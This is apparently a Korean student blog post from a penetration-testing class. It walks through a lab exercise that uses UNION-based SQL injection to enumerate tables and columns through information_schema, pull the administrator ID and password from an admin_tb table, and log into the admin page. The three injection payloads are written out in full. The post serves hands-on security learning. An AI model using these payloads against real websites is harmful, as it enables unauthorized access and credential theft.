보안 / 개발 챌린저가 목표

모의해킹 실습 (1) 본문

IT Security/Class_Do it

모의해킹 실습 (1)

햄미은서 2020. 10. 7. 15:33

hammieunseo.tistory.com/32

 

모의해킹의 이해 (2)

▶ SQL Injection  - SQL Injection 이란 ?  § 사용자의 입력 값으로 웹 사이트 SQL 쿼리가 완성되는 약점을 이용하며,  입력 값을 변조하여 비정상적인 SQL 쿼리를 조합하거나 실행하는 공격.  § 개발자�

hammieunseo.tistory.com

이 자료를 활용하여, 관리자의 아이디와 패스워드를 UNION SQLi로 알아내고 관리자 페이지에서 로그인 해보기.

 

① 관리자의 정보가 담겨있는 테이블 찾기

'UNION SELECT '1', '2', '3', '4', COLUMN_NAME FROM information_schema.columns --

⇒ admin_tb

 

② 관리자 정보 있는 테이블의 컬럼명 찾기

'UNION SELECT '1', '2', '3', '4', COLUMN_NAME FROM information_schema.columns WHERE TABLE_NAME='admin_tb' --

⇒ adminid, adminpwd 가 관리자의 id와 pwd로 추측된다.

 

 

 

 

 

 

 

 

 

 

③ 관리자의 ID와 PW를 찾기

'UNION SELECT '1', '2', '3', adminid, adminpwd FROM admin_tb --

ID와 PW이다.

 

해당 정보로 관리자 페이지에 로그인을 시도하면,

다음과 같이 잘 접속을 할 수 있다.

'IT Security > Class_Do it' 카테고리의 다른 글

모의해킹 실습 (3)  (0) 2020.10.14
모의해킹 실습 (2)  (0) 2020.10.12
네트워크 장비 진단  (0) 2020.09.25
Window 서버 진단 (2)  (0) 2020.09.23
Window 서버 진단 (1)  (0) 2020.09.21
Comments